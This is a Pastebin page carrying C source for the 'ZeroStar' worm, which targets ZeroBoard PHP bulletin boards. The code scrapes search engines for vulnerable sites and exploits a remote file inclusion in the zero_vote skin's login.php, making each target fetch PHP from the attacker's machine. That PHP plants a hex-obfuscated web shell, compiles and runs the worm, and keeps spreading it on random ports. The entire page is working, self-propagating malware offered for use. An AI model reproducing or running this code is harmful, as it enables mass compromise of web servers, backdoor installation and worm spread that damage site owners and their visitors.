Advertisement
FlyFar

ZeroStar Worm- ZeroBoard Vulnerability Exploit

Feb 2nd, 2023
863
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 19.36 KB | Cybersecurity | 0 0
  1. #include <stdio.h>
  2. #include <unistd.h>
  3. #include <stdlib.h>
  4. #include <sys/socket.h>
  5. #include <netdb.h>
  6. #include <netinet/in.h>
  7. #include <signal.h>
  8. #include <sys/ioctl.h>
  9. #include <net/if.h>
  10. #ifdef __sun__
  11. #include <sys/sockio.h>
  12. #endif /* __SunOS__ */
  13.  
  14. #define DEBUG_ING
  15. #undef DEBUG_ING
  16.  
  17. #define TMP_FILE "./tmp.core"
  18. #define CMD_FILE "./cmd.core"
  19. #define PRC_FILE "./proc.core"
  20. #define SCS (0)
  21. #define MIN (1)
  22.  
  23. #ifdef __linux__
  24. #define DEF_ETH "eth0"
  25. #else
  26. #ifdef __FreeBSD__
  27. #define DEF_ETH "ed0"
  28. #else
  29. #ifdef __sun__
  30. #define DEF_ETH "hme0"
  31. #endif
  32. #endif
  33. #endif
  34.  
  35. #define MAX_BUF (0x0000ffff)
  36. #define FIR_BUF (0x00000800)
  37. #define SEC_BUF (0x00000400)
  38. #define THR_BUF (0x00000200)
  39. #define MIN_BUF (0x00000100)
  40.  
  41. #define VENDOR "nzeo.com"
  42.  
  43. // search rule
  44. #define FD_RULE_0 "/zboard/zboard.php"
  45. #define FD_RULE_1 "/zb41/zboard.php"
  46. #define FD_RULE_2 "/bbs/zboard.php"
  47. #define FD_RULE_3 "/zb/zboard.php"
  48. #define FD_RULE_4 "/zb40/zboard.php"
  49. #define FD_RULE_5 "/board/zboard.php"
  50. #define FD_RULE_6 "zboard.php"
  51. #define FD_RULE_7 "zboard.ph"
  52.  
  53. // pattern
  54. #define FD_PATH_0 "/zboard/skin/zero_vote/login.php"
  55. #define FD_PATH_1 "/zb41/skin/zero_vote/login.php"
  56. #define FD_PATH_2 "/bbs/skin/zero_vote/login.php"
  57. #define FD_PATH_3 "/zb/skin/zero_vote/login.php"
  58. #define FD_PATH_4 "/zb40/skin/zero_vote/login.php"
  59. #define FD_PATH_5 "/board/skin/zero_vote/login.php"
  60. #define FD_PATH_6 "/skin/zero_vote/login.php"
  61.  
  62. #define RESULT_OK "200 OK"
  63. #define MAKE_STR1 "BACKDOOR MAKE SUCCESS"
  64. #define MAKE_STR2 "ZBCODE MAKE SUCCESS"
  65. #define DELT_STR1 "BACKDOOR DELETE SUCCESS"
  66. #define DELT_STR2 "ZBCODE DELETE SUCCESS"
  67.  
  68. #define DEF_PORT (31337)
  69. #define CONN_PORT (80)
  70. #define DEF_TIME (20)
  71.  
  72. int set_sock(char *sc_gt_host,int port,int type);
  73. void re_connt_lm(int st_sock_va,int type);
  74. int proc_r();
  75. void t_kill();
  76. void sf_exit();
  77. int g_ip(char *ip);
  78. int make_cmd_file();
  79. int filter_f(char *test_bf,int tnum);
  80.  
  81. int sock;
  82.  
  83. struct tg_rl
  84. {
  85.  int r_num;
  86.  char *r_str;
  87.  char *url_str;
  88. };
  89.  
  90. #define TARGET_NUM (7)
  91. #define SEARCH_NUM (4)
  92.  
  93. struct tg_rl __tg_rule_va[]=
  94. {
  95.  {0,FD_RULE_0,FD_PATH_0},
  96.  {1,FD_RULE_1,FD_PATH_1},
  97.  {2,FD_RULE_2,FD_PATH_2},
  98.  {3,FD_RULE_3,FD_PATH_3},
  99.  {4,FD_RULE_4,FD_PATH_4},
  100.  {5,FD_RULE_5,FD_PATH_5},
  101.  {6,FD_RULE_6,FD_PATH_6},
  102.  {7,FD_RULE_7,FD_PATH_6},
  103.  {8,NULL,NULL}
  104. };
  105.  
  106. struct search_rule
  107. {
  108.  int num;
  109.  u_char *url;
  110.  int maxnum;
  111.  int defnum;
  112.  u_char *http_head;
  113. };
  114.  
  115. struct search_rule search_va[]=
  116. {
  117.  {0,"www.google.com",990,10,"http://"},
  118.  {1,"kr.search.yahoo.com",990,15,"http://"},
  119.  {2,"search.nate.com",480,10,"http://"},
  120.  {3,"search.lycos.com",990,10,"//"},
  121.  {4,"kr.altavista.com",1000,10,"//"},
  122.  {5,NULL,0,0,NULL}
  123. };
  124.  
  125. void t_kill()
  126. {
  127. #ifdef DEBUG_ING
  128.  fprintf(stdout,"time out\n");
  129. #endif
  130.  close(sock);
  131.  sock=-1;
  132.  signal(SIGALRM,SIG_DFL);
  133.  return;
  134. }
  135.  
  136. void sf_exit()
  137. {
  138. #ifdef DEBUG_ING
  139.  fprintf(stdout,"safe exit\n");
  140. #endif
  141.  close(sock);
  142.  kill((int)proc_r(),9);
  143.  unlink(TMP_FILE);
  144.  unlink(CMD_FILE);
  145.  unlink(PRC_FILE);
  146.  exit(-1);
  147. }
  148.  
  149. int main(int argc,char *argv[])
  150. {
  151.  FILE *fp;
  152.  
  153.  int tnum=(SCS);
  154.  int chk=(SCS);
  155.  int gogo=(SCS);
  156.  int whgl=(SCS);
  157.  int qnum=(SCS);
  158.  int tgrl_sl=(MIN);
  159.  int _conn_num=(SCS);
  160.  int port=(CONN_PORT);
  161.  int def_port=(DEF_PORT);
  162.  int sc_gt_sock;
  163.  int host_chk=(SCS);
  164.  
  165.  u_char *gg_ptr=NULL;
  166.  u_char *t_ptr=NULL;
  167.  u_char __zr_bf[(MAX_BUF)];
  168.  u_char *port_ptr=NULL;
  169.  
  170.  char pkt[(FIR_BUF)];
  171.  char host[(SEC_BUF)];
  172.  char url[(SEC_BUF)];
  173.  char test_bf[(MAX_BUF)];
  174.  char req_t_bf[(THR_BUF)];
  175.  char ip[(MIN_BUF)];
  176.  char atk_code[(MIN_BUF)];
  177.  
  178.  signal(SIGINT,sf_exit);
  179.  signal(SIGTSTP,sf_exit);
  180.  
  181.  while((whgl=getopt(argc,argv,"S:s:T:t:Q:q:P:p:H:h:U:u:"))!=EOF)
  182.  {
  183.   extern char *optarg;
  184.   switch(whgl)
  185.   {
  186.    case 'S':
  187.    case 's':
  188.     tnum=atoi(optarg);
  189.     if(SEARCH_NUM<tnum)
  190.     {
  191.      fprintf(stderr,"target error\n");
  192.      exit(-1);
  193.     }
  194.     break;
  195.  
  196.    case 'T':
  197.    case 't':
  198.     tgrl_sl=atoi(optarg);
  199.     if(TARGET_NUM<tgrl_sl)
  200.     {
  201.      fprintf(stderr,"target error\n");
  202.      exit(-1);
  203.     }
  204.     break;
  205.  
  206.    case 'Q':
  207.    case 'q':
  208.     qnum=atoi(optarg);
  209.     break;
  210.    
  211.    case 'P':
  212.    case 'p':
  213.     def_port=atoi(optarg);
  214.     break;
  215.    
  216.    case 'H':
  217.    case 'h':
  218.     memset((char *)host,0,sizeof(host));
  219.     strncpy(host,optarg,sizeof(host)-1);
  220.     host_chk++;
  221.     break;
  222.    
  223.    case 'U':
  224.    case 'u':
  225.     memset((char *)url,0,sizeof(url));
  226.     strncpy(url,optarg,sizeof(url)-1);
  227.     host_chk++;
  228.     break;
  229.    
  230.    default:
  231.     exit(-1);
  232.   }
  233.  }
  234.  
  235.  (int)make_cmd_file();
  236.  
  237.  if(fork()==0)
  238.  {
  239.   signal(SIGALRM,SIG_IGN);
  240.   for(whgl=0;whgl<argc;whgl++)
  241.   {
  242.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
  243.   }
  244.   strcpy(argv[0],"receive mode process");
  245.   if((fp=fopen(PRC_FILE,"w"))==NULL)
  246.   {
  247.    sf_exit();
  248.   }
  249.   fprintf(fp,"%d\n",getpid());
  250.   fclose(fp);
  251.   sc_gt_sock=(int)set_sock(NULL,def_port,1);
  252.   (void)re_connt_lm(sc_gt_sock,0);
  253.  }
  254.  else
  255.  {
  256.   for(whgl=0;whgl<argc;whgl++)
  257.   {
  258.    memset((char *)argv[whgl],0,strlen(argv[whgl]));
  259.   }
  260.   strcpy(argv[0],"scanning mode process");
  261.  
  262.   switch(host_chk)
  263.   {
  264.    case 1:
  265. #ifdef DEBUG_ING
  266.     fprintf(stdout,"argument error\n");
  267. #endif
  268.     sf_exit();
  269.     break;
  270.    
  271.    case 2:
  272.     goto ok;
  273.     break;
  274.   }
  275.  
  276. #ifdef DEBUG_ING
  277.   fprintf(stdout,"search url: %s\n",search_va[tnum].url);
  278. #endif
  279.   for(_conn_num=qnum; _conn_num< search_va[tnum].maxnum; _conn_num += (search_va[tnum].defnum))
  280.   {
  281. conn: if((sock=(int)set_sock(search_va[tnum].url,(CONN_PORT),0))==-1)
  282.    {
  283.     goto conn;
  284.    }
  285.  
  286.    memset((char *)req_t_bf,0,sizeof(req_t_bf));
  287.    switch(search_va[tnum].num)
  288.    {
  289.     case 0:
  290.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  291.       "GET /search?q=%s"
  292.       "&hl=ko&lr=&ie=UTF-8&start=%d&sa=N "
  293.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
  294.      break;
  295.     case 1:
  296.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  297.       "GET /search/web?p=%s&b=%d "
  298.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
  299.      break;
  300.     case 2:
  301.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  302.       "GET /webpage/search.asp?query=%s&start=%d "
  303.       "HTTP/1.0\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num);
  304.      break;
  305.     case 3:
  306.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  307.       "GET /default.asp?query=%s&first=%d&pmore=more "
  308.       "HTTP/1.0\r\n"
  309.       "Accept-Language: ko\r\n"
  310.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
  311.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
  312.      break;
  313.     case 4:
  314.      snprintf(req_t_bf,sizeof(req_t_bf)-1,
  315.       "GET /web/results?itag=wrx&q=%s&stq=%d "
  316.       "HTTP/1.0\r\n"
  317.       "Accept-Language: ko\r\n"
  318.       "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)\r\n"
  319.       "Host: %s\r\n\r\n",(__tg_rule_va[tgrl_sl].r_str),_conn_num,search_va[tnum].url);
  320.      break;
  321.    }
  322.    send(sock,req_t_bf,strlen(req_t_bf),0);
  323.    whgl=(SCS);
  324.  
  325.    if((fp=fopen(TMP_FILE,"w"))==NULL)
  326.    {
  327.     return(-1);
  328.    }
  329.    signal(SIGALRM,SIG_IGN);
  330.    alarm(MAX_BUF);
  331.    
  332.    memset((char *)test_bf,0,sizeof(test_bf));
  333.    while(recv(sock,test_bf,sizeof(test_bf)-1,0))
  334.    {
  335.     fprintf(fp,"%s",test_bf);
  336.     memset((char *)test_bf,0,sizeof(test_bf));
  337.    }
  338.    fclose(fp);
  339.    close(sock);
  340.  
  341.    if((fp=fopen(TMP_FILE,"r"))==NULL)
  342.    {
  343.     return(-1);
  344.    }
  345.  
  346.    while(fgets(__zr_bf,sizeof(__zr_bf)-1,fp))
  347.    {
  348.     gg_ptr=__zr_bf;
  349.  
  350.     while(MIN)
  351.     {
  352.      t_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head);
  353.      gg_ptr=(char *)strstr(gg_ptr,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
  354.  
  355.      if(t_ptr!=NULL)
  356.      {
  357.       memset((char *)test_bf,0,sizeof(test_bf));
  358.       whgl=(SCS);
  359.       chk=(SCS);
  360.  
  361.       for(gogo=0;gogo<strlen(t_ptr);gogo++)
  362.       {
  363.        if(chk)
  364.        {
  365.         if(t_ptr[gogo]=='>')
  366.          chk=0;
  367.        }
  368.        else {
  369.         if(t_ptr[gogo]==' ')
  370.          continue;
  371.         else if(t_ptr[gogo]=='<')
  372.          chk=1;
  373.         else test_bf[whgl++]=t_ptr[gogo];
  374.        }
  375.       }
  376.  
  377.       if(!strstr(test_bf,__tg_rule_va[tgrl_sl].r_str))
  378.        continue;
  379.       else t_ptr=(char *)strstr(test_bf,__tg_rule_va[tgrl_sl].r_str);
  380.  
  381.       if(t_ptr!=NULL)
  382.        t_ptr[0]='\0';
  383.       else continue;
  384.  
  385.       if(filter_f(test_bf,tnum))
  386.       {
  387.        t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
  388.        if(strstr(t_ptr,search_va[tnum].http_head))
  389.         continue;
  390.  
  391.        memset((char *)host,0,sizeof(host));
  392.        memset((char *)url,0,sizeof(url));
  393.  
  394.        chk=(SCS);
  395.  
  396.        if(strstr(test_bf,search_va[tnum].http_head))
  397.        {
  398.         t_ptr=(char *)strstr(test_bf,search_va[tnum].http_head) + strlen(search_va[tnum].http_head);
  399.         port=(CONN_PORT);
  400.  
  401.         for(whgl=0;whgl<strlen(t_ptr)+1;whgl++)
  402.         {
  403.          if(t_ptr[whgl]=='/')
  404.          {
  405.           for(gogo=0;whgl<strlen(t_ptr);whgl++)
  406.            url[gogo++]=t_ptr[whgl];
  407.           strcat(url,__tg_rule_va[tgrl_sl].url_str);
  408.           break;
  409.          }
  410.          else if(t_ptr[whgl]=='\0')
  411.          {
  412.           strncpy(url,__tg_rule_va[tgrl_sl].url_str,sizeof(url)-1);
  413.           break;
  414.          }
  415.          else if(t_ptr[whgl]==':')
  416.          {
  417.           port_ptr=(char *)strstr(t_ptr,":")+1;
  418.           port=atoi(port_ptr);
  419.          }
  420.          else host[chk++]=t_ptr[whgl];
  421.         }
  422. #ifdef DEBUG_ING
  423.         fprintf(stdout,"Total:%s,URL:%s,HOST:%s,PORT:%d\n",test_bf,url,host,port);
  424. #endif
  425. ok:
  426.         sock=set_sock(host,port,0);
  427.         if(sock==-1)
  428.          continue;
  429.         else {
  430.          memset((char *)ip,0,sizeof(ip));
  431.          memset((char *)atk_code,0,sizeof(atk_code));
  432.          memset((char *)pkt,0,sizeof(pkt));
  433.  
  434.          (int)g_ip(ip);
  435.          snprintf(atk_code,sizeof(atk_code)-1,"dir=http://%s:%d/\r\n",ip,def_port);
  436.          snprintf(pkt,sizeof(pkt)-1,
  437.           "POST http://%s%s HTTP/1.0\r\n"
  438.           "Content-Type: application/x-www-form-urlencoded\r\n"
  439.           "Content-Length: %d\r\n"
  440.           "Host: %s\r\n\r\n%s\r\n",host,url,strlen(atk_code),host,atk_code);
  441.          send(sock,pkt,strlen(pkt),0);
  442.          memset((char *)pkt,0,sizeof(pkt));
  443.          recv(sock,pkt,sizeof(pkt)-1,0);
  444. #ifdef DEBUG_ING
  445.          if(strstr(pkt,RESULT_OK))
  446.          {
  447.           if(strstr(pkt,MAKE_STR1))
  448.            fprintf(stdout,"%s\n",MAKE_STR1);
  449.           if(strstr(pkt,MAKE_STR2))
  450.            fprintf(stdout,"%s\n",MAKE_STR2);
  451.           if(strstr(pkt,DELT_STR1))
  452.            fprintf(stdout,"%s\n",DELT_STR1);
  453.           if(strstr(pkt,DELT_STR2))
  454.            fprintf(stdout,"%s\n",DELT_STR2);
  455.           printf("%s: %s\n",RESULT_OK,host);
  456.          }
  457. #endif
  458.         }
  459.         close(sock);
  460.  
  461.         if(host_chk)
  462.         {
  463.          sf_exit();
  464.         }
  465.        }
  466.       }
  467.      }
  468.      else break;
  469.     }
  470.     memset((char *)__zr_bf,0,sizeof(__zr_bf));
  471.    }
  472.    fclose(fp);
  473.    unlink(TMP_FILE);
  474.   }
  475.   sf_exit();
  476.  }
  477. }
  478.  
  479. int set_sock(char *sc_gt_host,int port,int type)
  480. {
  481.  struct sockaddr_in sock_st;
  482.  struct sockaddr_in t_st;
  483.  int nw_gt_sock,s_s;
  484.  struct hostent *hst_etr;
  485.  int sc_gt_sock;
  486.  int t_c=0;
  487.  char t_b[(SEC_BUF)];
  488.  FILE *fp;
  489.  char http_rq[]="HTTP/1.1 200 OK\r\n\r\n";
  490.  
  491.  if(!type){
  492.   signal(SIGALRM,t_kill);
  493.   alarm(DEF_TIME);
  494.  
  495.   if((hst_etr=gethostbyname(sc_gt_host))==NULL)
  496.   {
  497.    return(-1);
  498.   }
  499.   if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  500.   {
  501.    return(-1);
  502.   }
  503.   sock_st.sin_family=(AF_INET);
  504.   sock_st.sin_port=htons(port);
  505.   sock_st.sin_addr=*((struct in_addr *)hst_etr->h_addr);
  506.   memset(&(sock_st.sin_zero),0,8);
  507.  
  508.   if(connect(sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
  509.   {
  510.    close(sock);
  511.    return(-1);
  512.   }
  513.   return(sock);
  514.  }
  515.  else{
  516.   if((sc_gt_sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  517.   {
  518.    return(-1);
  519.   }
  520.  
  521.   sock_st.sin_family=(AF_INET);
  522.   sock_st.sin_port=htons(port);
  523.   sock_st.sin_addr.s_addr=(INADDR_ANY);
  524.   memset(&(sock_st.sin_zero),0,8);
  525.  
  526.   if(bind(sc_gt_sock,(struct sockaddr *)&sock_st,sizeof(struct sockaddr))==-1)
  527.   {
  528.    close(sc_gt_sock);
  529.    return(-1);
  530.   }
  531. #define BK_LG 10
  532.   if(listen(sc_gt_sock,(BK_LG))==-1){
  533.    close(sc_gt_sock);
  534.    return(-1);
  535.   }
  536.   while(1){
  537.    s_s=sizeof(struct sockaddr_in);
  538.    if((nw_gt_sock=accept(sc_gt_sock,(struct sockaddr *)&t_st,&s_s))==-1)
  539.    {
  540.     close(nw_gt_sock);
  541.     close(sc_gt_sock);
  542.     return(-1);
  543.    }
  544.    while(recv(nw_gt_sock,&t_c,1,0)){
  545.     if(t_c==0x0d){
  546.      recv(nw_gt_sock,&t_c,1,0);
  547.      if(t_c==0x0a){
  548.       recv(nw_gt_sock,&t_c,1,0);
  549.       if(t_c==0x0d){
  550.        recv(nw_gt_sock,&t_c,1,0);
  551.        if(t_c==0x0a){
  552.         break;
  553.        }
  554.       }
  555.      }
  556.     }
  557.    }
  558.  
  559.    send(nw_gt_sock,http_rq,strlen(http_rq),0);
  560.    if((fp=fopen(CMD_FILE,"r"))==NULL){
  561.     close(nw_gt_sock);
  562.     close(sc_gt_sock);
  563.     return(-1);
  564.    }
  565.    memset((char *)t_b,0,sizeof(t_b));
  566.    while(fgets(t_b,sizeof(t_b)-1,fp)){
  567.     send(nw_gt_sock,t_b,strlen(t_b),0);
  568.    }
  569.    fclose(fp);
  570.    close(nw_gt_sock);
  571.    continue;
  572.   }
  573.   close(sc_gt_sock);
  574.   return(-1);
  575.  }
  576. }
  577.  
  578. void re_connt_lm(int st_sock_va,int type)
  579. {
  580.  if(st_sock_va==-1)
  581.  {
  582.   if(!type){
  583.    kill(getppid(),9); // parent
  584.   }
  585.   kill((int)proc_r(),9); // child
  586.   sf_exit();
  587.  }
  588. }
  589.  
  590. int proc_r(){
  591.  FILE *fp;
  592.  int proc_n;
  593.  if((fp=fopen(PRC_FILE,"r"))==NULL){
  594.   exit(-1); // child check.
  595.  }
  596.  fscanf(fp,"%16d",&proc_n);
  597.  fclose(fp);
  598.  return proc_n;
  599. }
  600.  
  601. int g_ip(char *ip)
  602. {
  603.  int sock;
  604.  struct ifreq ifpq;
  605.  struct sockaddr_in *pq;
  606.  
  607.  memset(&ifpq,0,sizeof(ifpq));
  608.  if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  609.  {
  610.   return(-1);
  611.  }
  612.  pq=(struct sockaddr_in *)&ifpq.ifr_addr;
  613.  pq->sin_family=AF_INET;
  614.  
  615.  memcpy(ifpq.ifr_name,(DEF_ETH),sizeof(ifpq.ifr_name));
  616.  if(ioctl(sock,SIOCGIFADDR,&ifpq)==0)
  617.  {
  618.   memset((char *)ip,0,(MIN_BUF));
  619.   snprintf(ip,(MIN_BUF)-1,"%s",inet_ntoa(pq->sin_addr));
  620.  }
  621.  return 0;
  622. }
  623.  
  624. #define BACKDOOR_PATH "zblog.php"
  625. #define CODE_PATH "zbcode"
  626. #define CODE_PATH_SRC "zbcode.c"
  627.  
  628. int make_cmd_file()
  629. {
  630.  unsigned long w1=0;
  631.  FILE *fp;
  632.  FILE *pf;
  633.  
  634.  if((fp=fopen(CMD_FILE,"w"))==NULL)
  635.  {
  636.   return(-1);
  637.  }
  638.  
  639.  fprintf(fp,"<?\n"
  640.   "chdir('../../');\n\n"
  641.   "if(($fp=fopen('%s','r'))!=NULL)\n"
  642.   "{\n"
  643.   "$pnum=fread($fp,32);\n"
  644.   "fclose($fp);\n"
  645.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
  646.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
  647.   "{\n"
  648.   "exit;\n"
  649.   "}\n"
  650.   "}\n\n"
  651.   "$cont=\"\\x3c\\x3f\\x0a\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x46\".\n"
  652.   "\"\\x4f\\x52\\x4d\\x20\\x41\\x43\\x54\\x49\\x4f\\x4e\\x3d\\x24\".\n"
  653.   "\"\\x50\\x48\\x50\\x5f\\x53\\x45\\x4c\\x46\\x20\\x4d\\x45\\x54\".\n"
  654.   "\"\\x48\\x4f\\x44\\x3d\\x50\\x4f\\x53\\x54\\x3e\\x27\\x3b\\x0a\".\n"
  655.   "\"\\x09\\x65\\x63\\x68\\x6f\\x20\\x27\\x3c\\x49\\x4e\\x50\\x55\".\n"
  656.   "\"\\x54\\x20\\x54\\x59\\x50\\x45\\x3d\\x48\\x49\\x44\\x44\\x45\".\n"
  657.   "\"\\x4e\\x20\\x4e\\x41\\x4d\\x45\\x3d\\x63\\x6d\\x64\\x20\\x56\".\n"
  658.   "\"\\x41\\x4c\\x55\\x45\\x3d\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
  659.   "\"\\x64\\x3e\\x3c\\x2f\\x46\\x4f\\x52\\x4d\\x3e\\x3c\\x50\\x52\".\n"
  660.   "\"\\x45\\x3e\\x27\\x3b\\x0a\\x09\\x24\\x63\\x6f\\x6d\\x6d\\x61\".\n"
  661.   "\"\\x6e\\x64\\x3d\\x73\\x74\\x72\\x5f\\x72\\x65\\x70\\x6c\\x61\".\n"
  662.   "\"\\x63\\x65\\x28\\x27\\x5c\\x5c\\x27\\x2c\\x27\\x27\\x2c\\x24\".\n"
  663.   "\"\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x29\\x3b\\x0a\\x09\\x65\".\n"
  664.   "\"\\x63\\x68\\x6f\\x20\\x60\\x24\\x63\\x6f\\x6d\\x6d\\x61\\x6e\".\n"
  665.   "\"\\x64\\x60\\x3b\\x0a\\x3f\\x3e\\x0a\";\n\n"
  666.   "$fp=fopen('%s','w');\n"
  667.   "fputs($fp,$cont);\n"
  668.   "fclose($fp);\n\n",PRC_FILE,BACKDOOR_PATH);
  669.  
  670.  if((pf=fopen(CODE_PATH,"r"))==NULL)
  671.  {
  672.   return(-1);
  673.  }
  674.  
  675.  fprintf(fp,"$cont=\"");
  676.  while(fread(&w1,1,1,pf))
  677.  {
  678.   fprintf(fp,"\\x%02x",w1);
  679.  }
  680.  fclose(pf);
  681.  fprintf(fp,"\";\n\n");
  682.  
  683.  fprintf(fp,"$fp=fopen('%s','w');\n"
  684.   "fputs($fp,$cont);\n"
  685.   "fclose($fp);\n\n",CODE_PATH);
  686.  if((pf=fopen(CODE_PATH_SRC,"r"))==NULL)
  687.  {
  688.   return(-1);
  689.  }
  690.  fprintf(fp,"$cont=\"");
  691.  while(fread(&w1,1,1,pf))
  692.  {
  693.   fprintf(fp,"\\x%02x",w1);
  694.  }
  695.  fclose(pf);
  696.  fprintf(fp,"\";\n\n");
  697.  
  698.  fprintf(fp,"$fp=fopen('%s','w');\n"
  699.   "fputs($fp,$cont);\n"
  700.   "fclose($fp);\n\n",CODE_PATH_SRC);
  701.  fprintf(fp,"$RES=`gcc -o %s %s`;\n\n",CODE_PATH,CODE_PATH_SRC);
  702.  
  703.  fprintf(fp,"chmod('%s',0755);\n",CODE_PATH);
  704.  
  705.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",BACKDOOR_PATH);
  706.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR1);
  707.  fprintf(fp,"} fclose($fp);\n\n");
  708.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL){\n",CODE_PATH);
  709.  fprintf(fp,"echo \"%s\\n\";\n",MAKE_STR2);
  710.  fprintf(fp,"} fclose($fp);\n\n");
  711.  
  712. #if 1
  713.  fprintf(fp,"$fnum=(rand()%%%d);\n",TARGET_NUM);
  714.  fprintf(fp,"$snum=(rand()%%%d);\n",SEARCH_NUM);
  715.  fprintf(fp,"$randnum=(rand()%400);\n");
  716.  
  717.  fprintf(fp,"while(1)\n{\n");
  718.  fprintf(fp,"if(($fp=fopen('%s','r'))!=NULL)\n"
  719.   "{\n"
  720.   "$pnum=fread($fp,32);\n"
  721.   "fclose($fp);\n"
  722.   "$pnum=str_replace(\"\\n\",\"\",$pnum);\n"
  723.   "if(($fp=fopen('/proc/'.$pnum.'/stat','r'))!=NULL)\n"
  724.   "{\n"
  725.   "exit;\n"
  726.   "}\n"
  727.   "}\n\n",PRC_FILE);
  728.  
  729.  fprintf(fp,"$port=(rand()%%65500);\n");
  730.  fprintf(fp,"if($port>1024){\n");
  731.  fprintf(fp,"exec(\"./%s -t $fnum -p $port -s $snum -q $randnum\");\n",CODE_PATH);
  732.  fprintf(fp,"}\n}\n");
  733. #else
  734.  fprintf(fp,"unlink('%s');\n",BACKDOOR_PATH);
  735.  fprintf(fp,"unlink('%s');\n",CODE_PATH);
  736.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
  737.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
  738.  fprintf(fp,"} else { fclose($fp);\n");
  739.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",BACKDOOR_PATH,BACKDOOR_PATH);
  740.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",BACKDOOR_PATH);
  741.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR1);
  742.  fprintf(fp,"}\n}\n");
  743.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
  744.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
  745.  fprintf(fp,"} else { fclose($fp);\n");
  746.  fprintf(fp,"$result=`rm -f %s`;\n$result=`del %s`;\n",CODE_PATH,CODE_PATH);
  747.  fprintf(fp,"if(($fp=fopen('%s','r'))==NULL){\n",CODE_PATH);
  748.  fprintf(fp,"echo \"%s\\n\";\n",DELT_STR2);
  749.  fprintf(fp,"}\n}\n");
  750. #endif
  751.  fprintf(fp,"?>\n");
  752.  fclose(fp);
  753. }
  754.  
  755. int filter_f(char *test_bf,int tnum)
  756. {
  757.  switch(search_va[tnum].num)
  758.  {
  759.   case 0: /* google */
  760.    if(!strstr(test_bf,"google")&&!strstr(test_bf,"/search?q=cache:")
  761.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
  762.     &&!strstr(test_bf,"%3F")&&!strstr(test_bf,"...")
  763.     &&!strstr(test_bf,VENDOR))
  764.    {
  765.     return 1;
  766.    }
  767.    else return 0;
  768.    break;
  769.    
  770.   case 1: /* yahoo */
  771.    if(!strstr(test_bf,"yahoo")&&!strstr(test_bf,"/cache.php?")
  772.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
  773.     &&!strstr(test_bf,"search")&&!strstr(test_bf,".html%")
  774.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  775.    {
  776.     return 1;
  777.    }
  778.    else return 0;
  779.    break;
  780.    
  781.   case 2: /* nate */
  782.    if(!strstr(test_bf,"nate")&&!strstr(test_bf,"RESULT")
  783.     &&!strstr(test_bf,"<")&&!strstr(test_bf,">")
  784.     &&!strstr(test_bf,"/search/")&&!strstr(test_bf,"%3F")
  785.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  786.    {
  787.     return 1;
  788.    }
  789.    else return 0;
  790.    break;
  791.    
  792.   case 3: /* lycos */
  793.    if(!strstr(test_bf,"lycos")&&!strstr(test_bf,"<")
  794.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3F")
  795.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  796.    {
  797.     return 1;
  798.    }
  799.    else return 0;
  800.    break;
  801.    
  802.   case 4: /* altavista */
  803.    if(!strstr(test_bf,"ref_")&&!strstr(test_bf,"<")
  804.     &&!strstr(test_bf,">")&&!strstr(test_bf,"%3f")
  805.     &&!strstr(test_bf,"...")&&!strstr(test_bf,VENDOR))
  806.    {
  807.     return 1;
  808.    }
  809.    else return 0;
  810.    break;
  811.    
  812.   default:
  813.    return 0;
  814.    break;
  815.  }
  816.  return 0;
  817. }
  818.  
Tags: cplusplus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement